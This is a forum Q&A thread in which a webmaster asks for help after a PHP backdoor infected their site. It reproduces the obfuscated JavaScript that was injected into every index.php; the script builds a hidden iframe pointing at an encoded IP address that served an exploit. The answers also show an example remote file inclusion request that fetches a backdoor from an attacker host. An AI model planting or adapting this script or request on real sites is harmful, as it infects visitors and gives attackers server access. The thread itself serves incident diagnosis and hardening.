Menu
My website was infected by a trojan script.
Somebody managed to create/upload a file called "x76x09.php" or "config.php" into my webspace's root directory. Its size is 44287 bytes and its MD5 checksum is 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. These results say it's "Backdoor/PHP.C99Shell" or "Trojan.Script.224490".
This file has been executed in the same moment when it was created. So it must have happened automatically. This file added the following malicious code to the end of every index.php on my webspace.
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
After that code was on my page, users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.
The infection did happen although I have allow_url_fopen and allow_url_include turned off. And my hoster says the file wasn't uploaded via FTP.
So my questions are:
Thank you very much in advance! I really need help.
This question is similar. But it's more like a report. I didn't know it's a virus from the beginning. So this question here refers to the virus itself, the other question does not.
258
Backdoor:PHP/Obfu allows unauthorized access to a computer system.It is a remote access tool that allows a hacker to gain access to a compromised computer, typically though a TCP or UDP port. Backdoors are usually standalone files that install themselves to the system after they are run.
A generic PHP web shell backdoor allows attackers to run commands on your PHP server much like an administrator. At times, the attackers may also attempt to escalate privileges. Using this shell, the attackers can: Access any type of data on your server.
Many of the websites we've seen that have been hacked are the result of a virus on a PC that's used to FTP files to the infected website. The virus steals the FTP password in a variety of ways - but primarily two.
First, if you're using a free FTP program like FileZilla, you should know that these programs store their saved login credentials in a plain text file. It's easy for the virus to find these, read them and send the information to a server which then logs into FTP with valid credentials, copies certain files to itself, infects them then sends them back to the website. Often times it also copies these "backdoor" shell scripts to the website as well so that when the FTP passwords are changed, they can still re-infect the site.
The virus also "sniffs" the FTP traffic. Since FTP transmits all data including username and password, in plain text, it's easy for the virus to see and steal the information that way as well.
Quite often, however, when we've seen a backdoor that causes the infection, it's usually the result of Remote File Inclusion vulnerability somewhere on the site. The hackers are constantly trying to add a URL that points to one of their backdoors to the end of any Request string. So in your access logs you might see something like:
/path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt????
Where the path/folder string is just for demonstration purposes here.
Sometimes that command works and they are able to copy id.txt to the intended website and thus have a backdoor shell script from which they can manipulate the files.
Change all passwords - FTP, database, cPanel or other administrative interface.
Scan all PCs for viruses.
Change to SFTP.
Check all folders for 755 permissions and all files for 644. This is what is standard.
If it were SQL injection the infection wouldn't be at the end of the file. It would be somewhere there's a SQL call to generate the content.
Yes. With today's backdoors, the attacker can and probably has already viewed the config.php files where your MySQL data is saved.
Change all passwords.
79
Your website has been hacked using exploit code.
You must updating everything, including any php libraries you may have installed.
Run phpsecinfo and remove all red and as much yellow as possible by modifying your .htaccess or php.ini.
Remove write privileges from all
files and folders your web root
(chmod 500 -R /var/www && chown
www-root /var/www) the chown should
be whatever user is running php so
do a <?php system('whoami');?> to
figure that out.
Change all passwords, and use sftp or ftps if you can.
Remove FILE privileges from your
MySQL account that your php
application uses.
20
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
